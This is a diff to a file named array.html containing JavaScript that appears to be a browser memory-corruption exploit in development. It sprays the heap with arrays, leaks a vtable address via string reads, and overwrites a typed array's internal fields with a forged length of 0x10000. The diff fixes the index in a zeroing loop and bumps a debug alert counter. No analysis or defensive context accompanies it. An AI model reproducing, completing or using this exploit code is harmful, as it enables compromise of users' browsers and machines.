--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start19");
+alert("start20");
 var spray=new Array(0x800);
 var tmp;
  for(var i=0;i<spray.length;i+=2){
@@ -100,7 +100,7 @@ a=arr_addr/2;
 var vftable=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
 //alert(vftable.toString(16));
 for(var i=typedarray_index;i<typedarray_index+0x40/4;i++){
- spray[spray_index][typedarray_index]=0;
+ spray[spray_index][i]=0;
 }
 spray[spray_index][typedarray_index]=vftable;
 spray[spray_index][typedarray_index+0x30/4]=0x10000;//length
